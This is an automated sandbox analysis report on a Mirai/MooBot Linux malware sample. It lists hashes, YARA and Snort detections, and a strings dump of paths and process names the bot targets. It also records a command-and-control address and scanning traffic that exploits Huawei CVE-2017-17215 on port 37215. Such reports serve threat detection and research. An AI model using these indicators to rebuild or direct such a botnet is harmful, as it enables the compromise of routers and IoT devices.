Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
skyljne.mpsl.elf

Overview

General Information

Sample name:skyljne.mpsl.elf
Analysis ID:1374447
MD5:fe4a2343ddb8e76551e46449ca85568a
SHA1:a82c92e1239ab1abd0bfd1e525546c8672f2a6a3
SHA256:a5a6a44fed3bad2aa586b947fe40ef9907ae1dbf83837a71cf97527b4bed55ae
Infos:

Detection

Mirai
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Detected Mirai
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Found strings indicative of a multi-platform dropper
HTTP GET or POST without a user agent
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely that the sample will exhibit less behavior.
Static ELF header machine description suggests that the sample might not execute correctly on this machine.
Static ELF header machine description suggests that the sample might only run correctly on MIPS or ARM architectures.
Joe Sandbox version:38.0.0 Ammolite
Analysis ID:1374447
Start date and time:2024-01-14 15:49:05 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:skyljne.mpsl.elf
Detection:MAL
Classification:mal100.troj.linELF@0/1025@1/0
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/skyljne.mpsl.elf
PID:5530
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
done.
Standard Error:
  • system is lnxubuntu20
  • sh (PID: 5543, Parent: 1383, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
  • gsd-print-notifications (PID: 5543, Parent: 1383, MD5: 71539698aa691718cee775d6b9450ae2) Arguments: /usr/libexec/gsd-print-notifications
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
skyljne.mpsl.elfJoeSecurity_Mirai_3Yara detected MiraiJoe Security
    skyljne.mpsl.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      skyljne.mpsl.elfLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x27134:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27148:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2715c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27170:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27184:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27198:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x271ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x271c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x271d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x271e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x271fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27210:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27224:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27238:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2724c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27260:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27274:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x27288:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x2729c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x272b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x272c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      SourceRuleDescriptionAuthorStrings
      5530.1.00007f633c400000.00007f633c42a000.r-x.sdmpJoeSecurity_Mirai_3Yara detected MiraiJoe Security
        5530.1.00007f633c400000.00007f633c42a000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          5530.1.00007f633c400000.00007f633c42a000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
          • 0x27134:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x27148:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2715c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x27170:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x27184:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x27198:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x271ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x271c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x271d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x271e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x271fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x27210:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x27224:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x27238:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2724c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x27260:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x27274:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x27288:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x2729c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x272b0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          • 0x272c4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
          Process Memory Space: skyljne.mpsl.elf PID: 5530JoeSecurity_Mirai_3Yara detected MiraiJoe Security
            Process Memory Space: skyljne.mpsl.elf PID: 5530Linux_Trojan_Gafgyt_28a2fe0cunknownunknown
            • 0x758:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x76c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x780:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x794:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x7a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x7bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x7d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x7e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x7f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x80c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x820:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x834:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x848:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x85c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x870:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x884:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x898:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x8ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x8c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x8d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            • 0x8e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
            Timestamp:192.168.2.14103.245.236.15244860199902030490 01/14/24-15:50:07.216838
            SID:2030490
            Source Port:44860
            Destination Port:19990
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:103.245.236.152192.168.2.1419990448602030489 01/14/24-15:50:27.723396
            SID:2030489
            Source Port:19990
            Destination Port:44860
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1441.34.5.140628372152835222 01/14/24-15:50:58.305665
            SID:2835222
            Source Port:40628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.1441.34.5.140628372152829579 01/14/24-15:50:58.305665
            SID:2829579
            Source Port:40628
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: skyljne.mpsl.elfAvira: detected
            Source: skyljne.mpsl.elfReversingLabs: Detection: 57%
            Source: skyljne.mpsl.elfVirustotal: Detection: 48%Perma Link
            Source: skyljne.mpsl.elfString: Content-Length: /proc/proc/%d/cmdliner/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//var/tmp//anko-app//opt/wgetcurlbusyboxechocatnanoPOST /goform/set_LimitClient_cfg HTTP/1.1

            Networking

            barindex
            Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.14:44860 -> 103.245.236.152:19990
            Source: TrafficSnort IDS: 2030489 ET TROJAN ELF/MooBot Mirai DDoS Variant Server Response 103.245.236.152:19990 -> 192.168.2.14:44860
            Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.14:40628 -> 41.34.5.1:37215
            Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.14:40628 -> 41.34.5.1:37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40628 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 40628 -> 37215
            Source: unknownNetwork traffic detected: HTTP traffic on port 37215 -> 40628
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.11.199.122:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 120.52.38.231:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.104.187.122:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.170.72.77:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 170.142.147.182:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.191.202.57:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.81.143.100:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 194.90.18.208:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.125.17.105:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.86.157.90:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.109.25.53:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.134.63.58:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 196.162.201.69:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.44.94.200:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.199.243.107:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.139.174.178:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.192.106.104:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.95.237.93:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.198.15.255:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.157.252.83:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.53.66.246:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.68.167.32:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.194.5.86:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.141.8.173:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 116.234.240.175:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.240.70.169:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.14.229.115:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 45.100.147.206:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.65.125.144:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 57.165.137.19:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 159.39.67.209:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.108.225.70:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.218.242.125:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.21.32.84:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.149.18.108:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.91.42.197:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.9.115.108:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.118.58.93:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.249.111.179:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.28.214.46:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 49.189.145.116:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 76.84.251.148:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 64.34.185.59:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.198.134.215:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.94.107.24:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.177.14.184:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.77.199.217:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.182.224.140:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 177.237.27.6:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.206.249.113:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.150.208.147:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.166.36.251:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.70.76.48:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.221.204.71:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.12.22.15:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.111.32.188:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.243.2.47:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.79.134.101:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.146.63.245:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.217.100.200:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.242.195.238:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.51.122.242:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 159.185.10.232:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.122.217.75:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 91.214.1.161:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.169.176.50:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.101.115.179:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 68.237.115.34:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.65.155.143:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.119.101.219:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.61.204.2:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.155.247.242:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.64.140.35:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 136.106.132.143:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.66.200.175:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.117.19.186:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.93.227.71:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.80.118.211:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.146.105.152:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.43.108.93:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.118.193.36:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.193.122.54:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.139.112.163:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.239.85.254:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 196.87.54.123:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.206.207.188:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 20.97.219.89:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.196.217.80:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.255.146.19:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 134.145.226.225:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.66.230.8:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.92.213.232:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.21.164.3:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.247.37.209:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.141.2.27:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 111.225.5.64:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.23.236.207:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.140.9.118:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.223.169.97:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.168.75.28:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.240.154.120:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.99.70.88:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.28.157.92:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 66.159.145.60:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.17.18.106:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 208.247.7.233:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 110.182.53.184:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.195.250.3:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.254.203.119:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.47.104.14:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.150.96.161:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.113.230.176:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.91.202.205:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.182.204.58:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 40.107.206.56:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.141.32.111:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 199.244.98.231:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.0.218.163:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.56.8.192:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.82.83.84:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.34.236.92:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.216.113.107:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.186.147.146:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.141.174.192:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.233.235.254:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 25.248.59.97:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.115.135.205:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 20.143.247.74:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.223.237.140:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.2.55.237:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.41.21.44:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.105.69.119:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.103.234.75:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.53.108.220:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.232.156.163:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.223.106.83:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 95.143.8.100:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.135.127.122:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.51.45.26:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.188.44.62:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.100.70.102:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 69.255.101.228:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.32.155.52:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.137.116.152:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.93.39.130:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 125.224.146.66:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.151.128.202:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.54.90.188:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.77.26.38:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.18.6.13:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.170.113.3:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 82.123.190.113:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 84.160.215.32:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.199.24.254:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.84.22.226:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.182.189.55:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 63.233.247.126:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 202.27.183.186:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.193.75.30:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 197.214.247.111:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 41.130.194.222:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.179.172.66:37215
            Source: global trafficTCP traffic: 192.168.2.14:33307 -> 157.70.15.152:37215
